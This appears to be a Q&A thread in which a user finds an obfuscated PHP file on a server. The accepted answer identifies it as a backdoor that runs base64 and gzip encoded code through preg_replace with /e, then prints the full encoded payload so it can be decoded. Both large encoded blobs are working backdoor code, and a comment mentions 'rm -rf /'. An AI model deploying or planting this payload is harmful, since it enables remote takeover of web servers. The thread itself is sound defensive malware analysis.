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'\x29\x29\x29\x3B","."); 
   ?>
   ```

---

Edit:

Here is the unobfuscated PHP code: http://pastie.org/1058996

Comment: Core is typically the core dump Apache generates after a fault for debugging use.  Careful with this - it seems some hosts carelessly set the core to dump in your http directory, making it available to any guests.  If you have access to Apache config, should change CoreDumpDirectory to a more security directory.

Comment: I didn't know that preg_replace was so dangerous.  Imagine if the payload was simply and obfuscated `rm -rf /`.  Wow...

Answer (score 161, accepted):

This is not entirely a regular expression.   The regex is `/.*/`,  which basically means "match everything".  The `/e` Modifier however `eval()`'s the code in the next parameter.  In fact this is a way for someone to hide code.   The following proof that this is a **backdoor**,  and you must **remove it immediately**.   Your system maybe compromised further.

This is what the backdoor looks like when it is accessed:

[image: Server security information]

the hex part of the code:

`\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28`

is acutally:
 `eval(gzinflate(base64_decode(`

This is the code will print out the source code for this backdoor.  However i would not execute the resulting PHP code,  unless it is on a disposable virtual machine.

```
<?php
print  gzinflate(base64_decode("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